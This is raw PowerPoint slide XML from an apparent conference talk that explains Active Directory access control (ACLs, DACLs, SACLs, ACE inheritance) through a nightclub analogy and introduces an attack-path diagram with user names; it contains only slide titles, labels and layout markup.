              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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ACE Inheritance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FEE231C-F007-4FD6-9EE4-DFB1B44B812C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="771981" y="734837"/>
            <a:ext cx="10838993" cy="6123163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227905483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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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SACL’s + ACE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F493CE4F-0808-4564-95AB-F2B3CE46F464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762001" y="807800"/>
            <a:ext cx="10801350" cy="6050200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115901396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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ACL’s  DACL’s  SACL’s and  ACE’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F568149E-5383-40C8-9F9C-8B77C0EF4EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833378" y="713064"/>
            <a:ext cx="4525244" cy="6144936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147384759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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLUB AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDC034F-6DA9-4D71-A573-A6B0019FD618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824025" y="816013"/>
            <a:ext cx="6331138" cy="5762164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50144239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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLUB AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC40EA16-BC5E-4C88-9029-73DB053D125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209855" y="1220340"/>
            <a:ext cx="5790016" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - bouncer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDC034F-6DA9-4D71-A573-A6B0019FD618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824025" y="816013"/>
            <a:ext cx="6331138" cy="5762164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Left 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B41DA52-D968-4709-A909-E3865B20AD2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20435907">
            <a:off x="7455876" y="935469"/>
            <a:ext cx="1997612" cy="56974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ACL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18C19A7-A607-4480-9805-7C30923D44F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10035706" y="95157"/>
            <a:ext cx="2073436" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defconparties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348243398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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLUB AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC40EA16-BC5E-4C88-9029-73DB053D125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209855" y="1220340"/>
            <a:ext cx="5790016" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACL - bouncer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - clipboard with names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDC034F-6DA9-4D71-A573-A6B0019FD618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824025" y="816013"/>
            <a:ext cx="6331138" cy="5762164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Left 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62FE90FB-3149-439E-943F-139DEBFF8BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8689066" y="3702760"/>
            <a:ext cx="1418571" cy="292466"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 6159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B1103B14-D2A7-4239-94D2-6FD44BD95865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10035706" y="95157"/>
            <a:ext cx="2073436" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defconparties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34695509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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Attack Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A464831-E962-428C-ABBA-BD95549122D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633191" y="1136453"/>
            <a:ext cx="949910" cy="8433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Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{592BCA9D-16F0-45B2-9F7F-757CDBC8CC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918682" y="4438951"/>
            <a:ext cx="949910" cy="8433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Joe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CCE8F3-A266-4C87-A784-0840E5576488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937536" y="1807626"/>
            <a:ext cx="1365681" cy="8433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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53192FB8-D90F-44D5-BF2C-2B9D5090091D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10182981" y="4827560"/>
            <a:ext cx="1427824" cy="843378"/>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DA Steve</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992618C5-B3C4-476A-B477-69D902FEDF8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244968" y="2816162"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Graphic 24" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B323E4BF-E29D-499D-B917-B2885056FDF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962099" y="1807626"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA5126E-9CE8-4035-8011-4A52E66E076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085289" y="4786210"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A60074-A66E-4DD4-878F-A5EC88EA1E4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276347" y="5255944"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Star: 7 Points 6">
            <a:extLst>
